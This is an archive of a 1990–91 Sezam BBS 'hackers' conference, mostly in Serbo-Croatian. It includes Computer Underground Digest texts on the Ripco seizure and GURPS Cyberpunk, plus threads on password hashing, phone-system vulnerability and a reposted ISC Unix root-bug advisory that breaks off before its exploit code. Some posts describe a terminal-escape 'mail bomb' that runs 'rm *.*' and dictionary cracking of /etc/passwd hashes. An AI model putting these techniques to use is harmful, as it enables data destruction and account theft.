immunity. Until we get rid of it we are at the mercy of folks like Cook, but prosecutorial immunity is forever. Neidorf won't get paid for what Cook has cost him. The only people involved in a persecution who get paid anything significant are those who participate voluntarily, and not all of them. ******************************************************************** >> END OF THIS FILE << ***************************************************************************
hackers.53 dejanr,
[...nastavak] ------------------------------ Date: 7 August, 1990 From: . Ripco (Bruce ?) Subject: Dr. Ripco Speaks Out ******************************************************************** *** CuD #1.27: File 3 of 4: Dr. Ripco Speaks out *** ******************************************************************** This document is being written to state my involvement with Operation Sundevil and the events that passed on May 8th of 1990. My name is Bruce Esquibel but most people in the modem world would know me better as Dr. Ripco, the sysop of the Ripco Bulletin Board in Chicago. Ripco operated since the winter of 1983 and preformed what I believe to be a good public service to the telecommunications world. Its label as a 'phreak and hacker' board was an incorrect statement which I lived with most of the time. Some content of the system was in fact dealing with that subject but I have always felt most of the information especially in the form of general files was nothing more than second hand news, traveling board to board. Neither the board or myself ever supported or was associated with formed hacker groups like the LOD or TKOS. In the years Ripco operated there were members from these groups at one time or another but only to establish accounts and rarely touched base or communicated with other users. The system was quite popular with it peaking at 701 users and averaging around 600 active at any one time. Daily it took in about 50 calls with this figure waxing and waning with the social seasonal changes of school schedules and holidays. The majority enjoyed the freedom of expression the system provided, not to figure out how to make a free phone call. Most of the activity was on the main message board which could be accessed by anyone, even those without validated accounts. The rest of the message bases Ripco had were more specialized in their subject matter but not too much more than what is found on other boards. Ripco's greatest claim to fame in my opinion was the general files. It seemed to attract new users like flies to honey. I don't think the reason for this was quality but in fact quantity. There was over 2500 of them, divided into 23 sections. Like the message bases only a minority of the files could be put into the hack/phreak class. Ripco operated with a bit of mystery to it. My personal involvement on the board was next to nill. Unlike other operators who rule their boards like a god, I decided long ago to let the people do what they wanted without getting in the way and give them the freedom to stand on their own two feet. This didn't mean the system was total anarchy, in fact many complimented on how well the system was structured. This unusual concept let some to believe the whole system was a setup and I was accused on several occasions of being a FBI sting board or associated with some kind of law enforcement. Adding to this was some argument over where the bbs was actually located. A few adventurous individuals attempted to track it down through the CNA bureau and ended up at a vacant storefront. The real explanation is a long story but it comes down to multiple screw-ups by Illinois Bell more than any deceptive practices on my part. This of course doesn't happen in real life thus the only people that can get a phone number for a fictitious address are 'feds'. At least now I can put that rumor to rest. On May 8th I was awakened at my home at 6:30a m by several Secret Service agents with a warrant for computers and telecommunications equipment. They also had a second warrant issued to the address where Ripco operated out of. Although there are better ways to start the day, this did not come as a real surprise to me. Since 1987 when Shadow Hawk made the papers with his $2.3 million software theft charges it occured to me that as more and more people are caught, if they even were remotly connected to Ripco, eventually something would turn up on my end. This could be considered the reasoning of a mad man but I have always felt that there was no illegal activity going on within the system and could defend it no matter how petty it was taken apart. To put it another way, Ripco's bark had a hell of a reputation but no bite. This was probably and still is true depending how you look at it. The warrants issued were only (!?!) seizure warrants issued to the addresses. There were no names on them and I was not arrested or charged by the Secret Service. This provided me some relief but since I didn't get to sleep till 4am that morning it was probably a lack of reasoning on my part. There were at least 5 agents that came to the house, but I think they had a few more around back in case of an escape attempt. Three of them stayed while two others drove me to the other location. The only question they asked before I left was it would be easier if I gave the location of any computers I had there to which the reply was 'none.' This later proved true since no items were taken, but they did spend about an hour looking through everything. I wish to point out that this was not a scene that would make good television. They didn't break down any doors, no one I observed had a gun drawn and overall they were pleasant in their mannerisms. This is not being said in defense of them but I always have been curious about the stories passed around where swat teams come down on a 16 year old for running a few MCI numbers. One interesting side note to you electronic phreaks out there is their radios, which probably use Motorolas digital voice protection circuitry trip every car alarm in the neighborhood when keyed. Several of the agents said this was normal and wished they didn't have this side effect. As I traveled with the agents to the other location I started to think what they were about to see and if anything was there that needed a fast explanation. The only thing that occured to me was three handguns I kept for personal protection. I informed the driver of this fact and he radioed ahead to let them know. He said matters like that isn't their concern but added they have to check with local law enforcement to see if I was in violation of city or state laws. When we arrived there was a sizable crowd waiting. Besides 5 or 6 more SS agents, there were a few others in suit and tie (the SS dresses casual) and at least one Chicago police car with a couple officers. The agents that escorted me there led me to a woman probably in her mid or late 20's. She apparently was the one in charge and gave me instructions on how we were going to enter the building. Before unlocking the front door she asked several times if any boobytraps were set either for them or the computers. I found this questioning amusing but was the only one smiling of the group. Unlocking the front door led to questions about where the guns were located and instructions on how to find them. I brought up the fact the alarm system had to be turned off and after a few attempts she managed to deactivate it. A different agent was sent in and recovered the weapons. As we entered the main room I was told not to touch anything but to point out the computer the board was run off of, which I did. The woman then introduced herself as Barbara and informed me of what I already knew, they were there to carry out a warrant and that it would probably take a while. She handed me a piece of paper which was the actual warrant and as I looked it over, a paragraph stated it was issued based on an attached affidavit, specifically pages 26-39 by a special agent Lawson. Asking where the attached affidavit was brought the reply "it was a closed document, I didn't have any rights to see it" and added 'its an on-going investigation'. I was then informed by her that I was not under arrest nor charged but they had to read the Miranda rights to me since any questions I answered could be used against me. Another agent said they did have questions but I did not have to answer them, could answer them with a lawyer present or even have a lawyer present and not answer them. He also pointed out that I could stop answering the questions at any time so I figured I'd agree to answer them since there wasn't all that much to hide anyway. Although an attempt was made to get comfortable within the building, the main area is full of junk collected over the years and the limited seating made things a bit crowded. We eventually ended up out back outside where the questioning took place. From this point on Barbara made few other comments and the bulk of the questions were handled by another young agent named Tim. The questions started with an apology by Tim saying there was someone who requested specific questions to be asked for a case study or something along those lines. He said they were fairly simple but was required to ask them. These questions were general in nature and read off a xerox sheet, mostly a list of phrases that were looking for definitions. What is a phreaker, hacker, know what a virus is, have you ever written or distributed one, etc. After this opening round of Q & A, he announced we were going on to more specific questions involving myself and the bulletin board. I don't really remember most of the questions but the subject dealt with my awareness that both credit card and long distance access codes were being passed through the system and what was on the hidden boards that normally wasn't part of standard access, and who had access to them. My answer to these led into the system maintenance and how I handled it. As far as the question about the codes went, I replied no I was not aware of that and he point out they had printouts proving they were. Of course it crossed my mind that if they already had soild proof, why bother to ask the questions. I wish to publicly state that this type of information was posted from time to time but I did not lie to the question. Regular users of the board were aware that long ago I made clear the system policy on this matter. Long distance codes along with credit card information was not allowed to exist on the system. I felt that any specific information left that could lead to direct fraud was not welcome and would be removed and persons who repeated violating this themselves would be removed from the system also. To clarify the phrase 'specific information' to the readers of this file I wish to explain my position on how I considered board policy on messages. It is no secret that many of the posts of board 5 (fone phun) either solicited for the need of or said they had and would share such information. I never considered this wrongful for a number of reasons. The primary one would be most people on there were blowing smoke as far as really knowing anything either fraudulent or important. Few people outside the bbs community realize that in many areas both status and ego are wrongfully important factors to others within the modem society. Many people who wish to raise their status will often come up with outlandish claims in an attempt to convince others he or she is an expert on one matter or another. Any attempt to suppress this act I felt would of damaged Ripco's open door policy since people do have to start somewhere and eventually learn their peers will catch on fast if someone is pulling a bluff. Thus this type of activity was tolerated but the line was crossed if anyone attempted to really do it. For example if a message contained something like 'just dial 1-800-555-1212 and punch in 123456 at the tone', the entire message was removed or in more cases re-edited especially if other parts were about non-related matters. Returning to the questioning, the above was explained as such but not as a whole. If in fact they did have printouts of such activity, I suggested an explanation which covered the maintenance aspect of the board. Basically Ripco operated itself with my chores limited to validating new users and updating the general files. Once every morning the messages left since my last check-in were read. The removal/re-edit if needed was applied at this time. Considering this occured daily around noon, a message posted let's say at 3:00pm the preceding day was in existence for nearly 21 hours before it got my approval or disapproval. Thus I pointed out that in theory they could have a printout of something but if checked the following day, it should have been removed. This was not second questioned by them and they seemed content with it. As far as the hidden boards went, there were two as most of the system users knew but were not really active. Board 9 to the best memory serves me was completely non-existant. Although it was used in the past for various things, after one of many hard drives crashes it bit the big one and was not in service. The message file required to use it was not there and I believe there was even a line in the program that reset the security bit of people that did have access in the past so they couldn't accidently enter causing a 'file not found' error. Board 10 was active but fewer than 6 people could claim to access it. Originally it was set up when an attempt was made on my part to collect a few bucks to keep the system running back in 1985. It contained few messages and would only gain 5 or 6 more a year. Questioning from this point on was more broad in nature, jumping from subject to subject. Items like the anarchy files which were made up in part of bomb construction articles were deemed 'wrong' by them and I defended by saying such information could be gathered from numerous public sources. They still insisted it was 'wrong' and shouldn't have been made available. One fact that arose well into our chat is that it became obvious that besides Tim who seemed to know little besides a few buzzwords, none of those here really had an understanding of computers or much else as far as a technical background went. Another agent even admitted later that they were only here to serve the warrant, as far as what was really going on with the investigation and who or what was involved, they didn't know. Any questions I attempted to ask them were generally not answered and the ultimate question of 'why me?' was given the reply 'catch the evening news, this is happening right now all over the country, should make some good headlines.' Even the simple question of what's next, where does the stuff end up needed a short conference among them and they decided on the following: after its boxed up downtown, it's shipped to Washington to a department called 'diagnostics'. Tim appeared to be the only one with knowledge of this because one of the other agents asked him 'who runs that?'. Tim explained to him that it was part of the SS and was started a couple years ago. The other agent just shrugged his shoulders. To put some people fears to rest, there wasn't much else going on. I expected they were going to ask me about certain individuals or if I knew anything else going on, but they didn't. Even subjects like PHRACK and the LOD were only touched upon, no specific questions were asked or answered. They seemed pleased to find a catalog printout of the general file section with the PHRACK issues but considering anyone with a valid account had access to the actual files, this didn't seem to make sense to me. After a couple hours of this with many lulls in the questioning they asked if I would sign a statement saying basically everything I said was true and I did because it was. The only other thing they wanted in the statement was that I was in fact the operator and did make an attempt to keep the board clean on a daily basis. Makes me wonder now what that could be twisted into later down the line. In all they were here for about 6 hours. In that time I learned little on what was going on. One of the agents said there were 2 representatives from AT&T present but didn't know why, saying they just had instructions to pick them up this morning before they came and got me. My gut feeling was the code/credit card numbers that much of the conversation was based on. Drawing to the end they informed me the warrant was completed, led me back inside after taking a few snapshots of your truly and handed me a receipt of what they took. Annoying in the first place them being there, the first thing that caught my eye was both my personal Macintoshes were on the list along with the related hardware including a 940 meg worm drive and laser printer. Laser printer? Maybe if you could pick it up and throw it at someone it could be considered a lethal weapon but what else? Ripco operated on an Apple //e and had no connections to the macs besides being near them which apparently is the way they determined what stayed and what went. My guess is that after examining the rats nest of wiring that existed around the 3 computers, they figured anything plugged into the power strip must have been tied in with each other somehow. An IBM 386 clone and an Apple //gs sat on the floor only a couple feet away but were untouched. Other items taken included a 1955 Western Electric model D500 phone, any personal phone books including a copy of the Chicago White Pages and several pictures and cartoons I had hanging on the wall. This also included a picture of a hooker spread eagle from a bachelor party and a picture of Charles Manson clipped from some tabloid because it bore a resemblance to me. All disks if not in a sealed box (probably around 3000) were also taken along with paperwork found in various areas. These items were only listed as 'misc.' and not broken down on the receipt. I was cut loose only momentarily since an officer from the Chicago Police Department replaced the many people running in and out during the morning hours. He asked if the guns turned over to him were registered with the city, which they weren't because you can't, so I was charged with a misdemeanor, failure to register a firearm. A slight explanation about this: back when Jane Byrne was mayor, she wanted to outlaw handguns altogether. Some suburbs of Chicago tried this and met with resistance from the NRA and feared long court battles. So they offered an a grace period to get people who already had them to register them, but at a cut off date, handguns could no longer be registered. Thus anyone getting caught with a handgun after this did not face an illegal weapons charge, only the failure to register even though someone who registered prior is safe. It ends up going to court, having the weapons destroyed and getting 6 months supervision with no conviction on the books. This was the outcome of that situation. At least that story had an ending. As far as what is going between me and the Secret Service, I don't really know or have a clue. At this writing it has been nearly 3 months and I haven't heard a word from them. Everything is just speculation on my part since it seems the matter is being kept under wraps. Even the names of the others involved on that day were not released. I don't know if those other people were system operators or users. One agent said you'll probably hear from us in 6-8 months while another was not so optimistic and said it would probably take years adding later that it's a good chance I'll be in my 50's, married with children before I knew what happened. In the time shortly after the seizure I talked to several lawyers to at least get some opinions on what to do next. Without being charged it seems very little can be done. My only options are 1) sit back and relax, wait till they do something or 2) file a lawsuit to get the stuff back. All the attorneys brought up the suit idea but only one suggested it wasn't really a good way to go. Based on what they took as far as value goes, the preliminary costs would be about half with it approaching double if it has to go to court and heard in front of a jury. It appears the best outcome is to get the stuff back, you can't claim damages or get your court fees back when it comes to the federal government. One point I want to make clear is under a seizure warrant, all material taken is forfeited to the government. It doesn't seem like a situation where they have to give it back after examination. They have according to what little I could find on the subject, 5 years from the date of the warrant to set up an indictment. Even if no indictment is made, they don't necessarily have to return it. It can either be used for internal use or put up at auction. There was an article in Unix Today where an agent seemed to indicate the material is returned but I haven't found any support of this policy. My opinion on all of this is basic. The government came in, took my personal property to determine if there was any wrong doing somewhere. It seems like a case of being guilty and proving yourself innocent. Or in another light, them thinking there was wrong doing and getting the stuff to make sure. Either way its just not right. Although I have no desire to battle this in court on my own, it seems to be there should have been a charge for something, even if it was minor, with other stuff being added later if needed. At least it would beat this nazi/gestapo tactic of secrecy. Is Ripco's involvement with credit cards and access codes the real basis? Does the distribution of PHRACK play a part in it? What if they were investigating someone on the board and felt there was information that would help them? Did they ever think of knocking on the door first? If it was someone else they were after, should I be the one getting penalized? Does the first amendment come into play at all? Even though I am free to open another board at this time if I choose, why isn't a newspapers printing press taken when a reporter refuses to name his sources about a sensitive story? I don't have the answer to any of these questions. Even if I did, they might be the wrong questions in the first place. One opinion put forth by several people is that putting the board out of business could be all they wanted. Its possible if any one piece of information contained within Ripco was used in assisting someone to commit a crime, it could be all they needed. Maybe they looked at Ripco as a pain in the ass since the beginning but couldn't get rid of it any other way. In closing I'd like to point out that this is not a black and white issue reguardless of anyone's opinion. There were many who hated the board, thought it was trash and would of liked to see it removed for good. Well they got their wish but consider the circumstances of what happened. No reason given, none to offer. Think about that next time you sign on to your favorite system and see a message about someone selling a used computer or hard drive. If that item is by chance stolen merchandise, can the operator lose his computer because it aided someone to fence? Based on what happened to me up to this point, its only one step away. I am not a hacker, phreaker, have anything to do with credit cards or manufactured explosives. Until the weapons charge I never had been arrested and even my driving record has been clean since 1978. 1984 arrived a bit late but there is no doubt to me its here. Thanks again to everyone that supported the board and there is always the possibility another Ripco will appear. You just never know. ******************************************************************** >> END OF THIS FILE << *************************************************************************** ------------------------------ Date: Sat, 4 Aug 90 17:08:34 CDT From: "J. Eric Townsend" <jet@karazm.math.uh.edu> Subject: SJG Gurps Cyberpunk ******************************************************************** *** CuD #1.27: File 4 of 4: Another Gurps Review *** ******************************************************************** Here is a text file I wrote when SJG Gurps Cyberpunk was first released. Well, I rushed out and bought GURPS Cyberpunk, in the hopes that my money will help SJG with legal fees. (Plus, I collect game stuff.) On the front cover, in the SJG Illuminatus logo, it says: "The book that was seized by the U.S. Secret Service! (see p. 4)" Anyway... (Assuming I know *nothing* about cracking/phreaking. I won't comment on my real knowledge.) The following is a summary of text from the GURPS Cyberpunk supplement, with a few direct quotes. How Much Hacking Can I Do Based on the C-word manual: (From the section entitled "Netrunning".) 0. People use handles to hide their real identity (p62). 1. You can use sensitive devices to listen in on the signals being sent to a computer monitor, and redisplay the image on your own screen (p62). 2. General info on ISDN. (p64-65) 3. Computer accounts can come in various levels, from specialty logins (uucp) to "superuser" who has access to everything. Some programs can give you a higher level of access, equivalent to a "better" account (p68). 4. General info on back doors (p69). 5. General info on chat systems (p69). 6. A list of network names from around the world. No clues as to which are real. For the US, the following are listed: WUT, UDTS 2, Datel I & II, Telenet, Tymnet, ARPAnet, Infomaster, GraphNet, TRT, FTCC, UniNet, Autonet, CompuServe, GENIE, AlaskaNet, JANET, Internet (p 71). 7. Passwords can be really obvious, or hard to remember random text strings (p 72). 8. A program could possibly cause physical damage (p 72). 9. General Phreaking Info: - Diverters: go through a bunch of systems so that tracing takes a long time; - Junction Boxing: Just go down to the local junction box and tie in (p 76). 10. Lots of networks use different protocols that are sometimes incompatible (p 77). 11. Ma Bell stuff: - Existence of CN/A, and that Ma Bell can look you up in any way; - Line Routing: "With access to the main phone switch computer, a hacker can control everything about a specific phone line."; - Monitoring: a person could monitor calls with the right access; - After Billing: A person could change bills; (p 82). 12. Trashing: Go through somebody's trash to find out all sorts of interesting info about their computing equipment (p 86,87). (13 and 14 are from the section "Attack and Defense Programs". The programs are obviously s-f software, but...): 13. Promote: "This program is executed from a normal user account on a system. If successful, the account is 'upgraded' to a superuser account." 14. Webster: "This is the standard icebreaker for use against Password programs (see p 93.). It acts as an extremely fast 'brute-force' hacker." (p 92). 15. Credcard Crime: A false balance could be entered in an account. A device could be used to access somebody else's card without having the correct password to get into the credcard (p 105). [note: a credcard is a self-contained debit card that can have anything from a password to retina scan protection.] And, um, that's about it. Now that you've read that, you know how to break into computer systems and do phone phreaking... 1/2 :-) --J. Eric Townsend -- University of Houston Dept. of Mathematics (713) 749-2120 ******************************************************************** ------------------------------ **END OF CuD #1.27** ********************************************************************
hackers.54 aleks,
Hm, mislio sam na ono sto sam procitao u Data Communications i sto vazi za USA : oni imaju problema sa nekim gotovim paketima BBS-a i kazu da je moguce dok se neki korisnik na izgled normalno "seta" po BBS-u prokrijumcari se njegov program koji "skine" sifre za privilegije i "preda" mu ih pri sledecem javljanju. Kako ovo radi nemam blage predstave ali radi, tj. ljudi se zale. Jos nesto osim virusa, ovakvih trojanskih konja i sl. muce ih takozvane "mail bomb" narocito na UNIX mrezama - posto vecina terminala poseduje escape sekvencu da vrati sistemu naredbu koja se pojavi na ekranu u privatnu postu se ubacuje poruka na primer "rm *.*" koja se zavrsava ovom sekvencom, to se vrati sistemu ... i eto stete . Nartavno ovo ne radi ako je terminal drugog tipa (na primer VT -100 i 3270 se naravno nikako ne slazu) . Da li je nesto ovako moguce na PC-u ili PC terminalu sa ANSI Esc. sekvencama???
hackers.55 dejanr,
Poruka sam premestio iz SEZAM/primedbe... >> kazu da je moguce dok se neki korisnik na izgled normalno "seta" po >> BBS-u prokrijumcari se njegov program koji "skine" sifre za >> privilegije i "preda" mu ih pri sledecem javljanju. Kako ovo radi >> nemam blage predstave ali radi, tj. ljudi se zale. Pa, recimo zadaš download *.* i Sezam ti da kompletan softver ;) Naravno, od toga smo se obezbedili ali da nismo... bilo bi problema! Jedino je sreća što passwordi korisnika nigde na Sezamu nisu zapisani (koga interesuje kako je to moguće (ako svi već ne znaju) neka pita). Pozdrav, Dejan
hackers.56 dpozaric,
****************** Jedino je sreca sto passwordi korisnika nigde na Sezamu nisu zapisani (koga interesuje kako je to moguce (ako svi vec ne znaju) neka pita). ****************** Kodirano ? Nedostupni drive ? Nista trece mi ne pada na pamet... Ah, da... Boot ROM ? Ma, kako u njega upisati nove passworde ? Negdje svakako moraju biti pohranjeni...
hackers.57 dejanr,
>> Negdje svakako moraju biti pohranjeni... Pa, i da i ne. Zamisli da se umesto passworda čuva samo njegov checksum. Iz passworda koji korisnik otkuca se uvek može naći checksum pa uporediti, ali se iz checksuma ne može rekonstruisati password. Checksum bi bio nedovoljno bezbedan ali uz malo bolji algoritam (kakav recimo ovde imamo)... Inače, sličan metod je zastupljen na Unixu, VMS-u itd - upravnik sistema može *promeniti* nečiji password ali ga *niko* ne može saznati.
hackers.58 kale,
>> Negdje svakako moraju biti pohranjeni... Ne moraju. Kada se proverava korisnikova lozinka program nekakvom transformacijom od nje napravi broj pa taj broj uporedi sa onim zapamćenim. Na osnovu tog broja se u opštem slučaju ne može odrediti password. Ovaj sistem zaštite je uobičajena stvar.
hackers.59 bojt,
>> Inače, sličan metod je zastupljen na Unixu, VMS-u itd - >> upravnik sistema može *promeniti* nečiji password ali ga *niko* >> ne može saznati. Znači, ko zna algoritam i pokupi Checksume veliki je čovo...
hackers.60 dejanr,
>> > Inače, sličan metod je zastupljen na Unixu, VMS-u itd - >> > upravnik sistema može *promeniti* nečiji password ali ga *niko* >> > ne može saznati. >> >> Znači, ko zna algoritam i pokupi Checksume veliki je čovo... Pa, recimo na Unix-u svi znaju algoritam i svi mogu da pokupe checksume koji su u etc/passwd. Al šta im vredi kad se checksum ne može "vratiti" u password? Na VMS-u su ipak uveli dodatnu meru da ne može niko neprivilegovan ni pokupiti čeksume.
hackers.61 dpozaric,
********************* >> Negdje svakako moraju biti pohranjeni... Pa, i da i ne. Zamisli da se umesto passworda cuva samo njegov checksum. Iz passworda koji korisnik otkuca se uvek moze naci ********************* Jes', vala, pade mi na pamet i nesto takvo. Nije mi dala mira cinjenica da nisu nigdje pohranjeni (kako si najprije rekao), i to me natjeralo da zaista razmislim dok sam se vozio prema baki koju sam jucer isao posjetiti. Onda sam rekao sam sebi da je to apsolutno nemoguce i da negdje moraju biti prisutni, samo vjerojatno ne u ASCII ili nekom drugom "readable" formatu. Ona mi je, naravno, pao napamet checksum, jer sam ga i ja bio koristio (iako rijetko, jer nema potrebe u mom poslu). Vrlo zgodno, pogotovo sto nema teorije da netko povrati iz checksuma password bez algoritma. Jedino bi masina sama mogla naci algoritam kad bi nekome dali njegov checksum. Jer, masina je stvar koja moze unedogled vrtjeti kombinacije, samo ako ima dobar programcic. No, sumnjam da bi netko imao od toga koristi. Pozdrav, Drazen.
hackers.62 dpozaric,
**************** Ne moraju. Kada se proverava korisnikova lozinka program nekakvom transformacijom od nje napravi broj pa taj broj uporedi sa onim zapamcenim. Na osnovu tog broja se u opstem slucaju ne moze odrediti password. Ovaj sistem zastite je uobicajena stvar. **************** Ne moraju, dakako, u izvornom obliku. Ali, ja sam se malo prebukvalno drzao Dejanove izjave da ih nema nigdje na Sezamu pa otud i moja reakcija. Pozdrav, Drazen.
hackers.63 kale,
>> Jedino bi masina sama mogla naci algoritam kad bi nekome dali njegov >> checksum. Jer, masina je stvar koja moze unedogled vrtjeti >> kombinacije, samo ako ima dobar programcic. Na VAX-u je taj checksum dug 4 bajta - dakle preko 4 milijarde mogućih vrednosti. Da stvar bude još teža za provaljivanje, checksum se ne pravi samo od password-a, već i od username-a zajedno sa njim.
hackers.64 dejanr,
>> Vrlo zgodno, pogotovo sto nema teorije da netko povrati iz checksuma >> password bez algoritma. Jedino bi masina sama mogla naci algoritam >> kad bi nekome dali njegov checksum. Jer, masina je stvar koja moze >> unedogled vrtjeti kombinacije, samo ako ima dobar programcic. No, >> sumnjam da bi netko imao od toga koristi. Naravno, iz checksuma je *nemoguće* povratiti password pošto, primera radi, ima 26^8=2*10^27 passworda (ako uzmeš da je ograničen na 8 slova) i svega 2^32=4*10^9 32-bitnih passworda - dakle podosta raznih passworda otključava istu bravu. Međutim, ljudi (tj. hakeri :) ) se dosetili da uzmu neki rečnig iz spelling checker-a, da za svaku reč iz njega naprave checksum i onda samo indeksiraju koristeći ono što pročitaju iz /etc/passwd. Nauk - ne koristite neku smislenu reč za password. Srećna okolnost - naš rečnik još niko nema u kompjuteru :(
hackers.65 dejanr,
>> Na VAX-u je taj checksum dug 4 bajta - dakle preko 4 milijarde >> mogućih vrednosti. Da stvar bude još teža za provaljivanje, >> checksum se ne pravi samo od password-a, već i od username-a >> zajedno sa njim. Mislim da je tako bilo na VMS-u 3.XX. Posle su dodali još 4 bajta, kol'ko da se nađe ;)
hackers.66 dejanr,
========================== security/main #824, from bkep, 327 chars, Fri Oct 5 20:14:00 1990 There is/are comment(s) on this message. -------------------------- A few weeks ago "The Wall Street Journal" ran an article suggesting that hackers have become a serious threat to the phone system. Now, newspapers being what they are I realize that you cannot always take what's printed as gospel. That's why I'm asking. Does anyone think hackers are capable of disrupting the phone system? ========================== security/main #825, from srfleming, 1313 chars, Fri Oct 5 21:57:21 1990 This is a comment to message 824. There is/are comment(s) on this message. There are additional comments to message 824. -------------------------- > Does anyone think hackers are capable > of disrupting the phone system? I work in this field... so a lot of what I know, I can't say, and I WOULDN'T say a lot of it in a public forum anyway. Facts that are in the public domain prove beyond a shadow of a doubt that not only CAN hackers disrupt telephone service, they HAVE. Facts that are not in the public domain are even more chilling. The public switched network is terrifyingly vulnerable at all levels -- from hackers, from disgruntled employees, or from a terrorist with a hand grenade. But help is on the way. Long-line deregulation (giving birth to MCI and Sprint, et al) has greatly improved the survivability of long-distance communications. Cellular service has provided an alternative to vulnerable land lines in a number of disasters (earthquake, fire, etc.). In the next decade, personal communication networks (handheld telephones competing with wireline) will provide a bypass option for individual residences. Motorola is talking about handset-to-satellite bypass. And so forth. So -- while any particular element of telecom service is vulnerable to being knocked out by a hacker or other malicious intruder, it is becoming less and less likely that -all- service could be knocked out simultaneously by anything less than total war. ========================== security/main #827, from jcates, 111 chars, Fri Oct 5 23:30:56 1990 This is a comment to message 824. There are additional comments to message 824. -------------------------- Yes. Any system using computers, relying on them, is highly vulnerable to infiltration and debilitation. Jim ========================== security/main #828, from jcates, 287 chars, Fri Oct 5 23:34:10 1990 This is a comment to message 825. There is/are comment(s) on this message. There are additional comments to message 825. -------------------------- Silly thought. As that move is made, computer communications will follow it and use the same paths! There is no difference. As long as the computer has access to the lines, it can infil- trate the computers controlling those lines, as they are, invariably, also on the same lines. Jim ========================== security/main #830, from yllar.17, 357 chars, Sat Oct 6 03:03:35 1990 This is a comment to message 825. -------------------------- i doubt that a hacker would knock out the system, but do something they considered funny, is a very likely possibility car phones are also easy to attack (another tech file), i don't know from experience, only from what ive read and saw, but if i was the telco company, i would indeed worry, and do my best to make the system much more secure... ========================== security/main #831, from yllar.17, 538 chars, Sat Oct 6 03:06:39 1990 This is a comment to message 828. There is/are comment(s) on this message. -------------------------- as one who has been there, i can say that there are enought ways to 'screw over ma bell' to fill a large manual, everything from just plainly turning off a service or so, to getting calls free, or whatever..ive got several enemies that ive been worrying about ever since my arrest...some of these people do have the knowledge to really do damage, that is one reason, it's not that safe to give out a real phone number or address on some bbs's..you never know who might decide to have a little fun with you...it's happened... ========================== security/main #833, from roedy, 222 chars, Sat Oct 6 14:22:09 1990 This is a comment to message 831. -------------------------- Years ago I read about blue boxes and how they could fool the phone company's equipment. BC was the hub of security violation because our equipment up here was so antiquated. Newer equipment has better security controls.
hackers.67 dejanr,
========================== tojerry/hackers #730, from harryg, 210 chars, Mon Nov 19 15:19:38 1990 There is/are comment(s) on this message. -------------------------- TITLE: Hackers '90 I'd certainly appreciate hearing about the just ended Hackers'90 gathering. jerryp, ssatchell, bjc and wardc were among the elect this year. What can you share with us? Thanks! ....Harry ========================== tojerry/hackers #731, from bwebster, 1465 chars, Mon Nov 19 16:05:05 1990 This is a comment to message 730. -------------------------- Dunny if I'm among the elect, but I was at the conference. :-) Here's a first pass. The location was different than in previous years; instead of a summer camp facility outside of Saratoga, the conf was held at the Granlibakken resort at Lake Tahoe. Food, facilities and service were all excellent. Highlights (for me, anyway) included the sessions on socially significant hacker, user interface, and the EFF (Electronic Frontier Foundation); hearing more (and more accurate) details about the Secret Service's raid on Steve Jackson Games (Steve was there at the conference); previewing "Hyperland", a one-hour BBC production about agents and hypermedia, written by Douglas Adams and starring him and Tom Baker; seeing tape of Clifford Stoll's (_The Cuckoo's Egg_) testimony before a House committee on computer network security (talk about paradigm clashes!); Danny Hillis' presentation showing development of a simple network sorting algorithm via natural selection and cross-breeding of 64,000 versions running in paralell; catching up with old friends and making new ones. Disappointments included some of the other sessions (object-oriented programming, development tools, prophecies), not as much nifty hardware and software as in past years, and not enough fresh faces or ideas. Tremendous credit must go to Glenn Tenney and the rest of the Hackers staff (including Brett Glass) for putting together an excellent conference at a great site. ..bruce..
hackers.68 dherceg,
:> Evo jednog teoretskog pitanja: - sedneš za računar, odeš u Sezam, izabereš pakovanje neke velike konferencije od nekih 600-700Kb, i dok PkZip radi, ti prekineš vezu. Šta s▀e tada dešava?
hackers.69 vkrstonosic,
>> :> Evo jednog teoretskog pitanja: >> >> - sedneš za računar, odeš u Sezam, izabereš pakovanje neke velike >> konferencije od nekih 600-700Kb, i dok PkZip radi, ti prekineš vezu. >> >> Šta s▀e tada dešava? Dobiješ poruku NO CARRIER i moraš da zoveš ponovo. A Sezam se grdno nasekira, označi da nisi pročitao nove poruke i sačeka sledećeg korisnika. Nisi valjda mislio da oboriš Sezam ???
hackers.70 dejanr,
========== unix/att_derived #3620, from pbash, 6734 chars, Wed Feb 13 01:48:00 1991 Comment to 3618. Comment(s). ---------- RE: Gaping ISC Security hole The following article was posted on USENET describing a security hole in ISC UNIX and those versions of UNIX derived from this base code. While it was originally described as a problem on systems with *no co-processor*, at least one other site reported the following code attaining root status on a 486 machine. Personally, with all of the publicity on this, I can't believe ISC, and others, won't have a fix for this ASAP. Enjoy. ------------------------------------------------------------------- Article 4278 of comp.unix.sysv386: Path: glacier!stcvax!ico!ism.isc.com!ispd-newsserver!rpi!zaphod.mps.ohio-state.e du!wuarchive!uunet!fub!dobag.in-berlin.de!lumpi From: lumpi@dobag.in-berlin.de (Joern Lubkoll) Newsgroups: comp.unix.sysv386 Subject: SECURITY BUG IN INTERACTIVE UNIX SYSV386 Summary: IS VERY BAD ! Keywords: BAD BUG Message-ID: <KR3NBQQ@dobag.in-berlin.de> Date: 11 Feb 91 13:30:53 GMT Article-I.D.: dobag.KR3NBQQ Posted: Mon Feb 11 06:30:53 1991 Organization: Dobag Computer Systems Berlin Lines: 155 It was a long process of thoughts about this, but now, after half a year of disput with interactive, here it finally is: --- jl Hello you at Interactive Systems Coporation ! it seems that your very cute interactive unix System has a nice bug ! EVERYONE you has access to a shell and a compiler or an interactive System at home (to upload binaries) CAN BECOME ROOT. It seems that you programmers aren't able to programm the 386 protected mode correct. It exists the possibillity to write protect segment and pages... It would be very useful to write protect the internatl data- structures whicht the system uses to store information about the user. Offering the ability to write in these segments is just like offering CIA - Identity cards per mail-order for everyone (SALE $5). If you don't believe... try the litte program down there and you'll see ! I didn't believe it either but ... see yourself ! I expect bug-fixes immediatly or my money back for the interactive system... VERY soon please ! I have had a lot of conversation with 'Intra Unix' in Germany and a lot of people at 'ico.isc.com' about the problem. They just told me this being a only a 'feature' not a bug ! Simply said, it is a bug in the coprocessor emulation code, which will allow system without a co-cpu to be broken, just because some programmers aren't able to allocate their own buffers :-) If you have a co-cpu and Release >= 2.2 you may set the kernel tuneable parameters UAREAUS and UAREARW to 0 to protect yourself. Dobag does not have this problem, due to it being a 486 System, but there will be a lot of systems without a co-cpu ! There is only one way to fix this problem: Phone Interactive or your Distributor and get very angry ! Next follows toete.c, the program to kill any isc system not being equipped with a co cpu. --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE /* If you use Interactive Unix 2.2 uncomment the following line */ /* #define ISC22 */ #include <stdio.h> 